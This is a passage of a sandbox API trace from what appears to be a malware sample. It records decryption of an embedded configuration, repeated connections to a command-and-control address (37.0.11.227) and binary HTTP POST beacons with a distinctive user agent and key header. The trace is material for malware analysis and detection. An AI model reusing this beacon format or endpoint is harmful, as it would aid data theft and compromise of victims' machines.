[0176.104] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0176.105] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.106] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0176.106] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.107] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0176.107] GetProcessHeap () returned 0x690000 [0176.107] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0176.108] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.108] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0176.113] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.113] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0176.114] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.114] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0176.114] GetProcessHeap () returned 0x690000 [0176.114] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0176.115] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.115] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0176.116] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.116] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0176.119] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.119] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0176.120] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.120] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0176.120] GetProcessHeap () returned 0x690000 [0176.120] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0176.120] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0176.121] GetProcessHeap () returned 0x690000 [0176.121] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0176.121] GetProcessHeap () returned 0x690000 [0176.121] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0176.121] GetProcessHeap () returned 0x690000 [0176.122] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0176.122] GetProcessHeap () returned 0x690000 [0176.122] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0176.123] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.123] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0176.131] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.132] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0176.139] GetProcessHeap () returned 0x690000 [0176.139] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8790 [0176.140] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.140] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8790, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0176.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.142] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0176.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.143] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0176.143] GetProcessHeap () returned 0x690000 [0176.144] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8790 | out: hHeap=0x690000) returned 1 [0176.145] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.145] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0176.146] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.146] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0176.147] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.147] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0176.147] GetProcessHeap () returned 0x690000 [0176.147] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0176.148] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.149] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0176.149] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.152] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0176.153] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.153] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0176.154] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.154] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0176.155] GetProcessHeap () returned 0x690000 [0176.155] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0176.155] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3290*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aead8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0176.155] GetProcessHeap () returned 0x690000 [0176.155] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0176.155] socket (af=2, type=1, protocol=6) returned 0x290 [0176.155] connect (s=0x290, name=0x6aead8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0176.182] FreeAddrInfoW (pAddrInfo=0x6a3290*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aead8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0176.182] GetProcessHeap () returned 0x690000 [0176.182] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0176.182] GetProcessHeap () returned 0x690000 [0176.182] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0176.183] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0176.184] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0176.184] GetProcessHeap () returned 0x690000 [0176.184] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6ac460 [0176.184] GetProcessHeap () returned 0x690000 [0176.185] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0176.185] GetProcessHeap () returned 0x690000 [0176.185] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0176.185] GetProcessHeap () returned 0x690000 [0176.185] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0176.186] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0176.187] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0176.187] GetProcessHeap () returned 0x690000 [0176.187] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ac520 [0176.187] GetProcessHeap () returned 0x690000 [0176.187] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0176.187] send (s=0x290, buf=0x6ac520*, len=242, flags=0) returned 242 [0176.188] send (s=0x290, buf=0x6aba40*, len=159, flags=0) returned 159 [0176.188] GetProcessHeap () returned 0x690000 [0176.188] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6a4fc8 [0176.189] recv (in: s=0x290, buf=0x6a4fc8, len=4048, flags=0 | out: buf=0x6a4fc8*) returned 204 [0176.265] GetProcessHeap () returned 0x690000 [0176.265] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac520 | out: hHeap=0x690000) returned 1 [0176.265] GetProcessHeap () returned 0x690000 [0176.266] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0176.266] GetProcessHeap () returned 0x690000 [0176.266] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac460 | out: hHeap=0x690000) returned 1 [0176.266] GetProcessHeap () returned 0x690000 [0176.266] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0176.266] closesocket (s=0x290) returned 0 [0176.267] GetProcessHeap () returned 0x690000 [0176.267] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0176.267] GetProcessHeap () returned 0x690000 [0176.267] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0176.267] GetProcessHeap () returned 0x690000 [0176.268] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0176.268] GetProcessHeap () returned 0x690000 [0176.268] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0176.268] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6a4fc8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x4ac) returned 0x290 [0176.270] Sleep (dwMilliseconds=0xea60) [0176.274] GetProcessHeap () returned 0x690000 [0176.274] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0176.275] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.276] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0176.282] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.282] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0176.293] GetProcessHeap () returned 0x690000 [0176.293] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0176.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.298] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0176.299] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.299] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0176.345] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.349] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0176.349] GetProcessHeap () returned 0x690000 [0176.349] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0176.350] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.351] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0176.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.354] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0176.355] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.356] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0176.356] GetProcessHeap () returned 0x690000 [0176.356] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0176.357] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.357] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0176.358] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.358] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0176.359] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.359] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0176.361] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.361] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0176.361] GetProcessHeap () returned 0x690000 [0176.361] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0176.361] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0176.361] GetProcessHeap () returned 0x690000 [0176.362] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0176.362] GetProcessHeap () returned 0x690000 [0176.362] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0176.362] GetProcessHeap () returned 0x690000 [0176.363] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0176.363] GetProcessHeap () returned 0x690000 [0176.363] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0176.364] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.366] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0176.373] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.376] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0176.387] GetProcessHeap () returned 0x690000 [0176.387] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0176.388] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.389] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0176.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.390] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0176.391] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.391] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0176.391] GetProcessHeap () returned 0x690000 [0176.392] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0176.393] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.393] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0176.394] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.394] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0176.395] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.395] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0176.395] GetProcessHeap () returned 0x690000 [0176.395] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0176.396] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.397] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0176.398] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.398] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0176.399] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.399] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0176.400] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0176.400] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0176.400] GetProcessHeap () returned 0x690000 [0176.400] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0176.400] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3240*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae850*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0176.400] GetProcessHeap () returned 0x690000 [0176.400] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3a0 [0176.400] socket (af=2, type=1, protocol=6) returned 0x294 [0176.401] connect (s=0x294, name=0x6ae850*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0176.433] FreeAddrInfoW (pAddrInfo=0x6a3240*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae850*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0176.433] GetProcessHeap () returned 0x690000 [0176.433] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0176.434] GetProcessHeap () returned 0x690000 [0176.435] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0176.436] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0176.437] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0176.438] GetProcessHeap () returned 0x690000 [0176.438] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6a91a8 [0176.438] GetProcessHeap () returned 0x690000 [0176.438] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0176.439] GetProcessHeap () returned 0x690000 [0176.439] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0176.439] GetProcessHeap () returned 0x690000 [0176.439] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0176.440] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0176.441] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0176.441] GetProcessHeap () returned 0x690000 [0176.441] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6a9268 [0176.441] GetProcessHeap () returned 0x690000 [0176.442] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0176.442] send (s=0x294, buf=0x6a9268*, len=242, flags=0) returned 242 [0176.443] send (s=0x294, buf=0x6aba40*, len=159, flags=0) returned 159 [0176.443] GetProcessHeap () returned 0x690000 [0176.443] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6ad790 [0176.443] recv (in: s=0x294, buf=0x6ad790, len=4048, flags=0 | out: buf=0x6ad790*) returned 204 [0176.533] GetProcessHeap () returned 0x690000 [0176.533] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9268 | out: hHeap=0x690000) returned 1 [0176.534] GetProcessHeap () returned 0x690000 [0176.534] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0176.534] GetProcessHeap () returned 0x690000 [0176.535] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a91a8 | out: hHeap=0x690000) returned 1 [0176.535] GetProcessHeap () returned 0x690000 [0176.535] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0176.535] closesocket (s=0x294) returned 0 [0176.536] GetProcessHeap () returned 0x690000 [0176.536] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3a0 | out: hHeap=0x690000) returned 1 [0176.536] GetProcessHeap () returned 0x690000 [0176.536] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0176.536] GetProcessHeap () returned 0x690000 [0176.537] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0176.537] GetProcessHeap () returned 0x690000 [0176.537] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0176.538] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6ad790, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xb70) returned 0x294 [0176.543] Sleep (dwMilliseconds=0xea60) [0176.544] GetProcessHeap () returned 0x690000 [0176.544] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0176.545] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.546] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0176.553] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.554] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0176.560] GetProcessHeap () returned 0x690000 [0176.560] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0176.560] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.563] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d028) returned 1 [0176.564] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.564] CryptSetKeyParam (hKey=0x69d028, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0176.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.565] CryptSetKeyParam (hKey=0x69d028, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0176.565] GetProcessHeap () returned 0x690000 [0176.566] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0176.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.567] CryptDecrypt (in: hKey=0x69d028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0176.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.569] CryptDestroyKey (hKey=0x69d028) returned 1 [0176.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.570] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0176.570] GetProcessHeap () returned 0x690000 [0176.570] RtlAllocateHeap 